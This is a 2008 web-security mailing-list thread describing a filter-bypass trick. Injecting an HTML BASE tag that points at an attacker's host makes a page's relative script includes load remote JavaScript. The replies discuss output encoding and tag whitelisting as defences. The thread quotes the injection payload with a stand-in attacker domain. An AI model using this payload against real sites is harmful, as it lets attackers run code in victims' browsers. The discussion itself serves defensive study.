RE: [WEB SECURITY] Nice little XSS trick

["White, Dain P" <dainw@xxxxxxx>]

In a real world example, I develop websites with content management systems that have WYSIWYG editors. Sure, these management systems are protected by some bombproof mechanism that keeps the bad guys from accessing the WYSIWYG editors, but my clients, the authorized users, are still not above copying and pasting content from other sites.

So, stripping out all HTML is not acceptable - can't work in this situation. I need to be able to provide my clients with the ability to copy and paste content from Word or wherever and still protect them from inadvertently doing Bad Things. 

Normally (for me) this involves a whitelist of accepted tags, and a blacklist that scours the content for Bad Things, via regex. In my particular case, this XSS wouldn't work, because the vector isn't in my whitelist and would be removed - but not everyone uses this sort of hybrid "greylist" approach - they rely on a blacklist that is looking for "script" - and in that case, this sort of attack is certainly a Bad Thing. 

Great job Amit. 

~Dain

-----Original Message-----
From: Gabriel Kälin [mailto:Gabriel.Kaelin@xxxxxxxxxxx] 
Sent: Tuesday, July 15, 2008 10:42 AM
To: Web Security
Subject: RE: [WEB SECURITY] Nice little XSS trick

Amit,

that's indeed an interesting attack because you use scriptless HTML semantics to first "kidnap" the client and then execute XSS. Yet, simple anti-XSS measures like proper output encoding of user content should thwart the attack. Bad enough in general if you can inject whole HTML tags! ;)

Gabe 

> -----Original Message-----
> From: Amit Klein [mailto:aksecurity@xxxxxxxxx] 
> Sent: Tuesday, July 15, 2008 1:34 PM
> To: Web Security
> Subject: [WEB SECURITY] Nice little XSS trick
> 
> Hi list
> 
> Recently I've been thinking about bypassing anti-XSS filters, 
> and a nice 
> little trick occurred to me, which I haven't seen anywhere (e.g. it's 
> not on RSnake's XSS cheat sheet - 
> http://ha.ckers.org/xss.html; it does 
> mention BASe, but not the trick I describe here). The idea is 
> to use the 
> HTML BASE tag to force loading of JS code from the attacker's host. 
> Consider a page with XSS vulnerability such as:
> 
> <html>
> ...
> ***XSS code may be embedded here***
> ...
> <script src="/foo/bar.js"></script>
> ...
> </html>
> 
> Now, an attacker can inject <base 
> href="http://www.attacker.tld/";>, and 
> next thing you know, the browser (IE, at least) loads the JS from 
> http://www.attacker.tld/foo/bar.js... And the beauty is that 
> there's no 
> "explicit" JS code involved in the payload itself.
> 
> Note that according to the HTML standard, BASE should be 
> placed in the 
> HEAD section 
> (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). 
> This is indeed observed by FF 2, but not by IE (checked IE6).
> 
> Thanks,
> -Amit
> 
> 
> --------------------------------------------------------------
> --------------
> Join us on IRC: irc.freenode.net #webappsec
> 
> Have a question? Search The Web Security Mailing List Archives: 
> http://www.webappsec.org/lists/websecurity/archive/
> 
> Subscribe via RSS: 
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
> 
> Join WASC on LinkedIn
> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
> 
> 

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA


----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA